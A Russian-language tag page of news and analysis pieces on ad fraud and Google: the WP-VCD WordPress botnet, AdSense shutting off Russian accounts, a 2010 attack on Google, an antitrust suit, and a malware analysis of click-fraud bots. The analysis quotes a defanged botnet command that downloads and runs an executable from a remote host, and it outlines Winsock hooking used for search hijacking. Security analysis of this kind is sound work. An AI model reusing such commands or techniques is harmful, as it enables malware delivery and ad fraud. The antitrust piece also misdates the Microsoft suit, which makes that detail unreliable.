Работа в Стамбуле

Метка: монетизация YouTube

  • WP-VCD сеть для накрутки показов и скликивания рекламы

    WP-VCD сеть для накрутки показов и скликивания рекламы

    Наши специалисты недавно опубликовали новое исследование, посвященное методам работы сети накрутки показов и скликивания рекламы WordPress-ботнета WP-VCD.

    Эта сеть активна с начала 2020 года, и её основная деятельность — управление сетью из 20 000 сайтов с «бесплатными загрузками», через которые распространяются пиратские коммерческие темы для WordPress. Пользователям, которые загружают такие пиратские темы, конечно же неизвестно, что те содержат бэкдор, который позволяет группе накрутчиков рекламы WP-VCD захватывать контроль над их сайтами.

    сеть для скликивания рекламы

    Скомпрометированные таким образом web-сайты используются для перенаправления посетителей на сайты нарушителей, где размещаются фишинговые страницы или что-то ещё. Но помимо этого WP-VCD также внедряет на ломаные сайты рекламу Google AdSense, чтобы получать доход еще и с помощью рекламных схем (оплата за каждый показ или за каждый клик).

    Однако, по данным множества исследований, в настоящее время примерно 30-45% всех пользователей интернета используют блокировщики рекламы, что, разумеется, негативно сказывается и на рекламных доходах группировки WP-VCD.

    Наши исследователи рассказывают, что группировка не сидит сложа руки и уже отреагировала на эту тенденцию. Теперь накрутчики показов интегрируют в свой софт скрипт антиблокировщика, который помогает обходить механизмы обнаружения рекламы, используемые современными расширениями для блокировки рекламы, и показывать рекламу на сайтах несмотря ни на что. Причем, по мнению экспертов, члены группы использовали для этих целей скрипт, который был размещен в сети еще в 2017 году.

  • Google AdSense полностью отключил монетизацию всем российским пользователям

    Сервис таргетированной рекламы Google AdSense полностью деактивировал аккаунты пользователей из России. «Это означает, что получать доход от монетизации блогов и YouTube через такие аккаунты на счета в российских банках будет нельзя», — говорится в заявлении компании. Там уточнили, что заработок пользователей за июль сервис выплатит между 21 и 26 августа.

    Ютуберы из России активно переезжают в другие страны на постсоветском пространстве

    Рекламный сервис Google AdSense деактивировал аккаунты пользователей из России, следует из рассылки компании пользователям. Скриншот письма опубликовал портал 3dnews. «Мы деактивируем все аккаунты AdSense, страной местоположения которых указана Россия. Это означает, что получать доход от монетизации через такие аккаунты будет нельзя», — говорится в сообщении. Заработок за июль сервис выплатит между 21 и 26 августа, если в аккаунте не приостановлено получение платежей и достигнуты пороги оплаты, уточнили там. Остаток по балансу российским пользователям Google планирует выплатить в течение 60 дней. 

    В марте 2022-го Google запретила продажи любой онлайн-рекламы в России «в свете чрезвычайных обстоятельств». До этого, в феврале того же года, Роскомнадзор потребовал от компании прекратить показывать рекламу, содержащую неточную информацию о ходе СВО на Украине. Позже он потребовал от Google прекратить показывать рекламу YouTube с «ложной политической информацией» об Украине, которая направлена на «дезинформацию российской аудитории». 

    В июле глава думского комитета по информационной политике Александр Хинштейн заявил, что скорость работы YouTube в России снизится сначала на 40%, а затем — на 70%. По его словам, эта мера направлена не против российских пользователей, «а против администрации иностранного ресурса, который по-прежнему считает, что может безнаказанно нарушать и игнорировать наше законодательство». Ухудшение качества загрузки видео на YouTube связано с действиями российских властей и является следствием того, что хостинг удаляет каналы российских журналистов, артистов и блогеров, пояснил он.

    До этого Роскомнадзор направил гендиректору Google Сундару Пичаи требование разблокировать более 200 YouTube-аккаунтов российских СМИ, органов власти и общественных деятелей. С 2020 года видеохостинг ограничил 207 российских ресурсов, при этом 83 из них — в 2024 году, отметили тогда в ведомстве. 

    Российские операторы, в том числе МТС и билайн, в конце июля начали предупреждать об ухудшении работы YouTube по независящим от них причинам. «Сейчас во многих регионах именно YouTube плохо работает, так как у них устарело оборудование», — заявили тогда в техподдержке билайна. В начале августа платформа DownRadar зафиксировала резкий рост жалоб российских пользователей на проблемы с доступом к YouTube. «Тут я ничего не могу сказать. В телефоне работает нормально, все грузится», — заявил на это пресс-секретарь президента Дмитрий Песков.

    Однако, после «замедления» YouTube 8 августа операторы связи отметили скачок общего объема трафика на 5-10%. В сетях региональных операторов он достигает и 20%. Они объясняют это использованием VPN для получения доступа к популярному видеосервису, а также активным копированием видео из YouTube на конкурирующие с ним российские ресурсы. Это грозит операторам, особенно региональным, дополнительными затратами на приобретение трафика у магистральных операторов, так как отечественные замены YouTube не имеют достаточно кеширующих серверов, особенно в регионах, поясняют операторы.

    Скачок трафика

    В пресс-службе крупнейшей российской точки обмена интернет-трафиком MSK-IX нам рассказали, что зафиксировали рост трафика за последнюю неделю на 5,6%, если сравнивать с обычными значениями, — до 3509 Гбит/с. В компании отметили, что мобильный трафик отдельно от общего не отслеживают. Генеральный директор оператора IT-решений «Обит» Андрей Гук оценил рост общего трафика российских операторов на 5-10% за последнюю неделю. 

    Напомним, что 8 августа в работе YouTube произошел масштабный «сбой», который длится до сих пор, хотя проблемы с доступом к видеосервису наблюдаются уже месяц. Российские власти, в том числе Роскомнадзор, поясняли ухудшение качества работы YouTube прекращением поддержки инфраструктуры кеширующих серверов Google в России. Хотя эксперты не сомневаются, что это дело рук Роскомнадзора, который блокирует видеосервис с помощью технических средств противодействия угрозам (ТСПУ), установленных на сетях всех российских операторов связи. В одном из своих постов глава комитета по информполитике Госдумы Александр Хинштейн туманно отмечал, что «деградация» YouTube — «вынужденный шаг, направленный не против российских пользователей, а против администрации иностранного ресурса». 

    Под инфраструктурой кеширующих серверов имеют в виду собственную CDN-сеть американской компании, так называемую Google Global Cache (GGC). Google развивает её во многих странах присутствия, в том числе и в России. Сервис позволяет загружать востребованный контент не с центрального сервера, который может быть расположен за тысячи километров, а с ближайшего сервера CDN (content delivery network, сеть распределенных по стране серверов, установленных на сетях операторов связи). В данный момент российская «дочка» Google в России проходит процедуру банкротства и CDN-сеть не поддерживает. Свои CDN-сети имеют и российские видеосервисы, например «VK Видео». 

    Поиск альтернатив 

    По словам президента ассоциации «Ростелесеть» Олега Грищенко, за последнюю неделю трафик в сетях российских региональных операторов вырос примерно на 10-20%. «Если говорить точнее, то, в целом, уровень трафика сохранился, но раньше его часть проходила через кеш-сервера и была во внутренней сети оператора. Теперь абоненты уходят искать информацию на внешние каналы связи, увеличивая закупаемый трафик», — пояснил он. 

    «Абоненты начинают больше искать нужную им информацию на альтернативных YouTube платформах. Однако наблюдается недостаток кеширующих серверов у отечественных видеоплатформ. Они поставили кеш-сервера у федеральных операторов, а у региональных провайдеров кеш-серверов установлено существенно меньше», — разъяснил Олег Грищенко. По его словам, операторы готовы к подобным скачкам с технической точки зрения. Но возрастают затраты на трафик, хотя пока рано судить, в какие суммы они выльются, добавил глава ассоциации «Ростелесеть».

    По данным «ТМТ Консалтинг» за I квартал этого года, первая пятерка федеральных провайдеров («Ростелеком», МТС, «ЭР-Телеком» (бренд «Дом.ру»), «Вымпелком» (бренд билайн) и ТТК) занимают 71%, еще 29% приходится на локальных игроков рынка. Президент ассоциации операторов кабельного телевидения «Макател» Алексей Амелькин рассказал, что, исходя из статистики одного из операторов, входящих в ассоциацию, за 5-11 августа трафик вырос на 5,5%, если сравнивать с неделей 22-27 июля. «Ростелеком», «Мегафон», МТС, «Вымпелком» и «ЭР-Телеком» отказались от комментариев. В пресс-службах Минцифры и ТТК не ответили на наш запрос. 

    Оди источник одного из крупных региональных операторов не зафиксировал аномального роста общего трафика, хотя и отмечает, что наблюдается увеличение трансграничного трафика. Очевидно, это результат более активного использования VPN-сервисов, пояснил он. При этом он отметил, что трафик YouTube с 1 августа просел примерно в полтора-два раза, а VK — вырос на треть в тот же день. «Можно наблюдать тенденцию перетока аудитории YouTube в «VK Видео», однако только части трафика», — сделал вывод он. В пресс-службе VK сообщили, что объем загрузок видеоконтента на сервис «VK Видео» за неделю с 5 по 11 августа вырос в 1,5 раза в сравнении со среднемесячными показателями июля. А количество авторов, впервые загрузивших видео на платформу, за эту же неделю увеличилось в 1,7 раза.

    YouTube на дисках

    Рост трафика может быть связан с тем, что ряд пользователей воспользовались опциями скачивания видео из YouTube на российские видеоплатформы, пояснил автор Telegram-канала abloud62 Алексей Бойко. Некоторые скачивают ценные для них видео и на жесткие диски, добавил он. Кто-то использует VPN-сервисы, чтобы получить доступ к YouTube, а такого рода шифрование формирует трафик повышенного объема, отметил эксперт. «Кроме того, десятки миллионов людей периодически пробуют получить доступ к сервису в обычном режиме, надеясь, что «замедления» наконец прекратили. Все это создает основания для роста трафика», — пояснил Бойко.

    Если ситуация с «замедлением» YouTube сохранится или ухудшится, то, по самым негативным прогнозам, от трафика видеосервиса останется не более 10%, которые будут ходить через VPN-сервисы. Это в свою очередь приведет к общему падению трафика в сетях операторов на 15-20%, рассказал наш источник в одном из крупных операторов связи, добавив, что нужно не меньше шести месяцев, чтобы увидеть картину целиком и понять последствия «замедления». Также, по его словам, многое будет зависеть от того, какие альтернативные YouTube видеосервисы смогут предложить российские ресурсы. «Если будет достойная замена YouTube, то трафик просто перераспределится в её пользу и месяцев через шесть про американский видеосервис забудут. Если достойной альтернативы не будет, нужно будет смотреть на трафик: он либо упадет, либо действительно перераспределится через VPN. Будет ли замещен чем-нибудь трафик YouTube, чем, как и когда, сейчас предсказать невозможно», — заключил он.

    Ну а сами ютуберы, ранее полуавшие вознаграждение на карты и счета в российских банках, дружной гурьбой ринулись в казахские и киргизские банки открывать себе новые счета и регистрировать новые учётные записи в сервисе Google AdSense с указанием страны платёжного профиля при регистрации, отличной от России. Для этих целей вполне подойдёт любая страна на постсоветском пространстве.

  • В целевой атаке на Google появился украинский след

    В целевой атаке на Google появился украинский след

    Интернет-атаки, которые могут стать поводом для ухода Google c китайского
    рынка, исходили из двух влиятельных учебных заведений страны. По предварительным данным, атаки совершались с апреля 2009 года, а
    в январе достигли пика.

    Google атакован украинскими хакерами

    Следы атаки ведут к шанхайскому университету Цзяотун и
    профессионально-техническому училищу Ланьсян. К такому выводу пришла команда
    экспертов по компьютерной безопасности, расследующая дело Google. По словам
    источников, атаки осуществлялись через подставные сети и инфицированные
    компьютеры, но их координаторы располагались именно в двух вышеназванных
    местах. С момента появления информации об атаке 12 января эксперты смогли лишь
    установить, что серверы хакеров располагались на Тайване.

    Проявление в списке подозреваемых двух китайских учебных заведений газета
    называет настоящим прорывом. Выход на их след стал возможным после получения
    информации от одной из компаний — подрядчиков министерства обороны США,
    которая пострадала от атаки, похожей на атаку на Google. Эта информация привела
    специалистов к кафедре информатики и вычислительной техники в школе повышения
    квалификации. Кафедрой руководит некий украинский профессор. Его имя не
    называется.

    Оба учебных заведения довольно тесно связаны с Народно-освободительной
    армией КНР. Программы университета Цзяотун в области информатики считаются
    сильнейшими в Китае. Студенты этого вуза несколько недель назад выиграли
    международные соревнования по программированию «Битва умов», которые устраивала
    компания IBM. Китайские студенты обошли даже своих коллег из Стэнфорда, которым
    прочили победу.

    Расположенная в провинции Шандун школа Ланьсян курируется министерством
    обороны страны. Среди прочих студентов в ней учатся военнослужащие. Локальную
    сеть в школе обслуживает компания, аффилированная с крупнейшим китайским
    поисковиком Baidu.
    Google пока не прокомментировал полученные сведения.

    До этого компания выяснила, что 12 января хакеры похитили ряд компьютерных
    кодов и пытались взломать аккаунты активистов, которые ведут борьбу за права
    человека и представляют оппозиционные китайскому правительству силы. Эксперты
    подтвердили, что хитроумные атаки программистов поразили компьютеры еще 30
    компаний. Лазейку для хакеров, скорее всего, предоставил довольно уязвимый с
    точки зрения безопасности браузер Internet Explorer от Microsoft.

    Атака была настолько серьезной, что Google вступил в конфронтацию с
    китайским правительством. Цензурные ограничения, установленные в стране,
    блокируют часть результатов работы поисковой машины. Темы, связанные с критикой
    правительства или же просто не поддающиеся однозначной оценке, через фильтр не
    проходят.
    Google в ответ на атаку заявил, что закроет поисковик и все офисы в Китае,
    если правительство не снимет ограничения свободы слова. Дискуссии по этому
    вопросу продолжаются, однако компромисс не найден.

    Вместе с тем слухи о том, что Google подозревает в непосредственном участии
    в атаках китайские власти, представители компании не подтвердили. Однако они
    точно уверены, что угроза исходила из Китая.

  • Google опять вляпалась в антимонопольный скандал

    Google опять вляпалась в антимонопольный скандал

    Компанию опять обвиняют в нарушении антимонопольного законодательства

    Google опять вляпалась в антимонопольный скандал

    Министерство юстиции США вместе с генеральными прокурорами 11 штатов подало коллективный антимонопольный иск против компании Google, обвинив технологического гиганта в поддержании незаконной монополии на поиск и поисковую рекламу в Интернете. Причём во всех штатах, которые присоединились к иску, генеральные прокуроры — республиканцы.

    Широко ожидаемый судебный процесс является самым значительным антимонопольным делом с тех пор, как в 1988 году министерство юстиции подало в суд на компанию Microsoft в связи с ее монопольным положением на рынке программного обеспечения.

    Нынешний иск является результатом годичного расследования в отношении Google и трех других технологических гигантов: Apple, Amazon и Facebook. По мнению авторов иска, компания Google пользовалась своим доминирующим положением на рынке для подавления конкуренции, для этого Google использует антиконкурентные соглашения: она платит миллиарды долларов производителям смартфонов, операторам связи и разработчикам, чтобы поисковик компании был предустановлен в устройствах по умолчанию.

    Генеральный прокурор Уильям Барр назвал иск грандиозным делом «как для министерства юстиции, так и для американского народа».

    «Этот иск наносит удар по самим основам контроля Google над Интернетом в интересах миллионов американских потребителей, рекламодателей, малого бизнеса и предпринимателей», – заявил Барр.

    В марте прошлого года Еврокомиссия уже оштрафовала Google почти на 1,5 миллиарда евро за злоупотребление доминирующим положением на рынке рекламы в интернете. Компания вводила договорные ограничения на размещение рекламы компаний-конкурентов на сторонних веб-сайтах, подобные соглашения заключались в индивидуальном порядке, нарушив таким образом антимонопольное законодательство Евросоюза. 

  • Black Hat SEO или бот для скликивания контекстной рекламы

    Black Hat SEO или бот для скликивания контекстной рекламы

    На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ 
    подмена поисковой выдачи в процессинге

    Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы. 

    Win32/Patched.P

    Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google, который был реализован в троянской программе Win32/Patched.P (ESET). В первый раз я столкнулся с этой вредоносной программой осенью 2008 года, и она привлекла меня тем, что используемый ей алгоритм подмены был хорошо продуманным и более сложным для обнаружения, чем у «конкурентов».
    Win32/Patched.P вносила всего лишь одно изменение в систему: она модифицировала системную библиотеку ws2_32.dll, которая отвечает за реализацию сетевых функций прикладного уровня (например, таких как сокеты) в операционных системах MS Windows. Полезная нагрузка представляла собой кусок ассемблерного кода, который дроппер вставляет в конец оригинальной ws2_32.dll, модифицируя также точку входа, таблицу экспортов, релокации и склеивая все секции в одну для упрощения жизни при вышеописанных модификациях.
    На рисунке 2 представлены интернет-сервисы, к которым этот троянец проявлял особенный интерес путем осуществления перехвата часто используемых для реализации сетевого взаимодействия системных функций, таких как:
    int WSASend(
    __in SOCKET s,
    __in LPWSABUF lpBuffers,
    __in DWORD dwBufferCount,
    __out LPDWORD lpNumberOfBytesSent,
    __in DWORD dwFlags,
    __in LPWSAOVERLAPPED lpOverlapped,
    __in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    );
    int WSARecv(
    __in SOCKET s,
    __inout LPWSABUF lpBuffers,
    __in DWORD dwBufferCount,
    __out LPDWORD lpNumberOfBytesRecvd,
    __inout LPDWORD lpFlags,
    __in LPWSAOVERLAPPED lpOverlapped,
    __in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    );
    int send(
    __in SOCKET s,
    __in const char *buf,
    __in int len,
    __in int fl ags
    );
    int recv(
    __in SOCKET s,
    __out char *buf,
    __in int len,
    __in int fl ags
    );
    int select(
    __in int nfds,
    __inout fd_set *readfds,
    __inout fd_set *writefds,
    __inout fd_set *exceptfds,
    __in const struct timeval *timeout
    );
    Перехватывая и контролируя указанные функции Winsock на этом уровне, можно осуществлять подмену любых GET/POST запросов независимо от разработчика браузера или его версии. Да и заметить сходу такую подмену сможет далеко не каждый системный администратор, не говоря уже о большинстве пользователей. На уровне модифицированного кода, на примере функции WSARecv(), это выглядит так.
    Конечно же, весь функционал не ограничивается только подменой результатов поиска. Есть интересные экземпляры ботов, которые осуществляют скликивание рекламы и накрутку контекстных объявлений.

    Сэмпл TDL4 — Win32/Olmarik.AOV

    Вот, к примеру, не так давно нами была замечена интересная особенность в некоторых новых экземплярах руткита TDL4 — Win32/ Olmarik.AOV, о котором я достаточно подробно написал в своей предыдущей статье в январе 2011 года. Но, если кто не в курсе, данному руткиту удается удерживать звание самой технологичной массовой вредоносной программы на протяжении вот уже нескольких лет.
    Это первый полноценный руткит для x64, которому удалось в обход проверки цифровой подписи и PatchGuard пробраться в ядро на 64-битных системах. Но давай вернемся к тому, из-за чего собственно пошел разговор об этом рутките. А дело в том, что после своей собственной успешной установки некоторые экземпляры этого руткита устанавливают в систему еще и троянцев из семейства Win32/Glupteba (ESET). Это наводит на мысли о том, что ресурсы ботнета начали сдавать в аренду. Также интересен тот факт, что дальнейшего взаимодействия между ботами Win32/Glupteba и TDL4 нет.
    Итак, сразу после установки и идентификации бот TDL4 получает из С&C команду:
    task_id = 2|10||hxxp://wheelcars.ru/no.exe
    Интерпретировать которую можно следующим образом:
    task_id = [command_id] [encryption_key] [URL]
    В нашем случае набор параметров совпадает с командой «DownloadAndExecute», поскольку ключ шифрования равен нулю, а идентификатор команды равен двум, и затем следует количество попыток ее выполнения, равное десяти. После установки в систему Win32/Glupteba получает задание уже из своего C&C и начинает его выполнение.
    Чаще всего бот получает два типа заданий — скликивание контекстной рекламы из рекламной сети «Бегун» и рассылку спама. Давай поподробнее рассмотрим, что же делает этот бот.
    В первом случае происходит посещение большого количества сформированных специальным образом веб-страниц, наполнение которых провоцирует появление определенного типа контекстных объявлений. Причем все веб-страницы, с которых происходит скликивание, расположены на серверах провайдера Masterhost. Если посмотреть на статистику сетевых обращений скликивающего бота, то можно заметить большое количество обращений к серверам компании «Бегун». Интерес со стороны Win32/Glupteba к другим сервисам контекстной рекламы замечен не был — возможно, это объясняется тем, что сам алгоритм скликивания контекстной рекламы реализован достаточно примитивно. А в крупных системах, таких как Яндекс.
    алгоритм скликивания контекстной рекламы
    Яндекс.Директ или Google AdWords, реализованы серьезные механизмы защиты от подобного рода мошенничества, которые сильно портят жизнь желающим быстрой наживы за счет вышеописанных способов нечестного продвижения.
    Сам же ботнет TDL4 так же, как и его предшественник предыдущей версии, активно монетизируется через «черные» методы продвижения веб-сайтов и подмену результатов поиска в популярных поисковых системах. Только он реализует гораздо более серьезные методы, используя способ скрытого запуска браузера Microsoft Internet Explorer через вызов ActiveX-компонента WebBrowser и эмуляции работы пользователя (при посещении веб-страницы меняется положение курсора). Кроме того, в нем реализован обход прочих превентивных методов обнаружения ботов.